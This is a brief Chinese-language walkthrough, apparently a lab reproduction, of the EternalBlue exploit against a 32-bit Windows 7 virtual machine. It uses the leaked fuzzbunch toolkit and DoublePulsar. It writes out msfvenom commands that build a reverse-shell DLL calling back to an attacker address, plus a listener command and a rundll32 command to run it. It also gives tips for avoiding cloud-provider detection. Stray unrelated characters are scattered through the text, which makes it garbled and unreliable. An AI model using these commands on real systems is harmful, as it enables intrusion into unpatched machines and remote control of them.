環(huán)境
VMware? Workstation 16 Pro
Microsoft Windows 7家庭普通版 Service Pack 1 32-bit 6.1.7601
Windbg Preview1.2206.19001.0
攻擊機(jī)環(huán)境
Python 2.6
pywin32-212.win32-py2.6.exe
fuzzbunch
PS:由于msf中沒有x86的攻擊payload,所以使用最開始的泄露工具集做利用
-
下載fuzzbunch后,修改xml文件信息匿刮,同時(shí)新建一個(gè)listeningposts文件夾
-
靶機(jī)需要關(guān)閉防火墻
漏洞復(fù)現(xiàn)
- 運(yùn)行fuzzbunch,然后新建一個(gè)項(xiàng)目
python fb.py
- 使用永恒之藍(lán)
use Eternalblue
-
看到Win就是成功了筷畦,但是還無法使用shell交互,需要使用Doublepulsar模塊加載dll
-
成功后會(huì)有個(gè)成功顯示
PS:如果是vps的msf刺洒,不要使用4444端口鳖宾,云服務(wù)商有檢測。不要使用meterpreter的反彈shell逆航,win7下反彈報(bào)錯(cuò)鼎文。
相關(guān)命令
- msf生成shell命令
msfvenom -p windows/shell_reverse_tcp lhost=192.168.32.199 lport=8973 -f dll -o 8973.dll
- msf快速監(jiān)聽命令
handler -p windows/shell_reverse_tcp -H 0.0.0.0 -P 8973
- windows下反彈dll命令
rundll32.exe 8973.dll,0